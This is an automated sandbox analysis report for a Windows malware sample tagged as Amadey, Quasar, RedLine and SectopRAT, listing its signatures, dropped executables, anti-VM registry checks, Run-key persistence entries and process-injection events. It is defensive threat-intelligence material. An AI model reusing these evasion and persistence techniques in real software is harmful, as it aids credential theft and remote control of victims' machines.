Malware Analysis Report

2024-10-19 08:35

Sample ID 240731-ehv9yazbla
Target 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
SHA256 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
Tags
amadey quasar redline sectoprat 0657d1 exodusmarket.io fed3aa office04 credential_access discovery evasion infostealer persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e

Threat Level: Known bad

The file 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e was found to be: Known bad.

Malicious Activity Summary

amadey quasar redline sectoprat 0657d1 exodusmarket.io fed3aa office04 credential_access discovery evasion infostealer persistence rat spyware stealer trojan

SectopRAT payload

RedLine payload

Quasar payload

Amadey

Quasar RAT

RedLine

SectopRAT

Credentials from Password Stores: Credentials from Web Browsers

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Loads dropped DLL

Adds Run key to start application

Enumerates connected drives

Blocklisted process makes network request

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Browser Information Discovery

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

GoLang User-Agent

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-31 03:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-31 03:56

Reported

2024-07-31 03:59

Platform

win10v2004-20240730-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

Signatures

Amadey

trojan amadey

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe N/A
N/A N/A C:\Users\Admin\1000029002\84743dcfde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\ProgramData\xpmvhsd\agpphek.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adada.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\73b79a2459.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\73b79a2459.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84743dcfde.exe = "C:\\Users\\Admin\\1000029002\\84743dcfde.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Endpoint Manager = "C:\\Program Files (x86)\\COMODO\\Endpoint Manager\\ITSMAgent.exe" C:\Windows\system32\msiexec.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 6980 set thread context of 7128 N/A C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 6712 set thread context of 2296 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7468 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 6824 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7344 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7156 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7668 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7888 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 8148 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 6832 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 2112 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 1156 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7432 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 3296 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
PID 6712 set thread context of 7072 N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\cookielib.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\distutils\command\bdist_wininst.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Mariehamn C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\xmllib.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\cachecontrol\wrapper.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Argentina\Mendoza C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Metlakatla C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Antarctica\McMurdo C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Hebron C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Etc\GMT+4 C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\dumbdbm.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\nl.msg C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Fakaofo C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\ctypes\macholib\framework.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\lib2to3\fixes\fix_reduce.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\lib2to3\Grammar.txt C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Africa\Brazzaville C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\widget C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\comdlg.tcl C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\utils\__init__.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\smtplib.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\distlib\database.py C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
